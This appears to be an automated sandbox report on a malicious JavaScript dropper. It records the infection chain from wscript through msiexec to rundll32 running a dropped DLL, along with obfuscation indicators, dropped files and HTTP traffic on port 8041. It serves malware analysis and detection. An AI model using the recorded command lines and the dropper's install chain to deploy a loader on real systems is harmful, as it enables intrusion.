Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800219B0 6_2_00000001800219B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002B9B4 6_2_000000018002B9B4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_00000001800249C0 6_2_00000001800249C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001F9C0 6_2_000000018001F9C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DA08 6_2_000000018001DA08
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EA28 6_2_000000018001EA28
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180033A3C 6_2_0000000180033A3C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CA80 6_2_000000018001CA80
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001FAC8 6_2_000000018001FAC8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DB10 6_2_000000018001DB10
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EB58 6_2_000000018001EB58
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CB88 6_2_000000018001CB88
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180023B94 6_2_0000000180023B94
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180021B98 6_2_0000000180021B98
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180024BA8 6_2_0000000180024BA8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180032BB8 6_2_0000000180032BB8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180022BBC 6_2_0000000180022BBC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001FBD0 6_2_000000018001FBD0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180042BFC 6_2_0000000180042BFC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180031C08 6_2_0000000180031C08
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DC18 6_2_000000018001DC18
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EC60 6_2_000000018001EC60
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CC90 6_2_000000018001CC90
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180046CAC 6_2_0000000180046CAC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001FD28 6_2_000000018001FD28
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001ED68 6_2_000000018001ED68
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DD70 6_2_000000018001DD70
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180021D84 6_2_0000000180021D84
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180024D94 6_2_0000000180024D94
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180022DA4 6_2_0000000180022DA4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180023DC4 6_2_0000000180023DC4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018002BDDC 6_2_000000018002BDDC
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CDE8 6_2_000000018001CDE8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001FE30 6_2_000000018001FE30
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EE70 6_2_000000018001EE70
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DE74 6_2_000000018001DE74
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180033E98 6_2_0000000180033E98
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001CEF0 6_2_000000018001CEF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180044F38 6_2_0000000180044F38
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001FF38 6_2_000000018001FF38
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001DF78 6_2_000000018001DF78
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180022F8C 6_2_0000000180022F8C
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180020FA0 6_2_0000000180020FA0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180023FB0 6_2_0000000180023FB0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180021FB4 6_2_0000000180021FB4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000180024FC4 6_2_0000000180024FC4
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000000018001EFC8 6_2_000000018001EFC8
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4B0E31BE 6_2_000001FF4B0E31BE
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4B0E29EE 6_2_000001FF4B0E29EE
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000273F807BE 6_2_0000000273F807BE
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_0000000273F7FFEE 6_2_0000000273F7FFEE
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE55C0 6_2_000001FF4CAE55C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD66C0 6_2_000001FF4CAD66C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEBED0 6_2_000001FF4CAEBED0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF82A0 6_2_000001FF4CAF82A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE16A0 6_2_000001FF4CAE16A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE42A0 6_2_000001FF4CAE42A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF66E0 6_2_000001FF4CAF66E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF7220 6_2_000001FF4CAF7220
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAFFBC0 6_2_000001FF4CAFFBC0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF13A3 6_2_000001FF4CAF13A3
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF2BB0 6_2_000001FF4CAF2BB0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB02812 6_2_000001FF4CB02812
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAECBE0 6_2_000001FF4CAECBE0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB01F40 6_2_000001FF4CB01F40
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CADA730 6_2_000001FF4CADA730
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB02F60 6_2_000001FF4CB02F60
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD9500 6_2_000001FF4CAD9500
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEA100 6_2_000001FF4CAEA100
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEB4E0 6_2_000001FF4CAEB4E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB01490 6_2_000001FF4CB01490
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD99D0 6_2_000001FF4CAD99D0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE4DB0 6_2_000001FF4CAE4DB0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB00210 6_2_000001FF4CB00210
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAFB5E0 6_2_000001FF4CAFB5E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF55E0 6_2_000001FF4CAF55E0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAF4550 6_2_000001FF4CAF4550
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE9120 6_2_000001FF4CAE9120
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD5D60 6_2_000001FF4CAD5D60
Source: C:\Windows\explorer.exe Code function: 8_2_03052164 8_2_03052164
Source: C:\Windows\explorer.exe Code function: 8_2_03051A7C 8_2_03051A7C
Source: C:\Windows\explorer.exe Code function: 8_2_03051A8C 8_2_03051A8C
Found potential string decryption / allocating functions
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018004816C appears 44 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180001400 appears 56 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3790 appears 39 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD325F appears 103 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3292 appears 70 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Document-18-33-08.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.spre.troj.evad.winJS@10/21@8/4
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 4_2_00FB3860
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 4_2_00FB4BA0
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB45B0 LoadResource,LockResource,SizeofResource, 4_2_00FB45B0
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLF268.tmp Jump to behavior
Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF93ACB531B807E54B.TMP Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Installer\MSIF29D.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000006.00000002.3331077235.000000018005F000.00000002.00000001.01000000.00000007.sdmp, vierm_soft_x64.dll.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: rundll32.exe, 00000006.00000003.2069928053.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000006.00000003.2066566980.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF160.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF29D.tmp, 00000004.00000000.2061647641.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSIF29D.tmp, 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmp, MSI7623.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr
Source: Binary string: kernelbase.pdb source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp
PE file contains an invalid checksum
Source: vierm_soft_x64.dll.1.dr Static PE information: real checksum: 0x81152 should be: 0xbc113
PE file contains sections with non-standard names
Source: vierm_soft_x64.dll.1.dr Static PE information: section name: memcpy_
Source: vierm_soft_x64.dll.1.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FD323C push ecx; ret 4_2_00FD324F
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9900D8 push cs; retf 6_3_000001FF4C9900FD
Source: C:\Windows\explorer.exe Code function: 8_2_0305EF4F push D5912897h; iretq 8_2_0305EF57
Source: C:\Windows\explorer.exe Code function: 8_2_0305F5BA push rcx; ret 8_2_0305F5BC
Source: C:\Windows\explorer.exe Code function: 8_2_0305EE21 push rsi; ret 8_2_0305EE27

Persistence and Installation Behavior
barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSIF29D.tmp Jump to behavior
Drops PE files
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\vierm_soft_x64.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49851
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49857
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49903
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49910
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 49912
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 8041 -> 50021
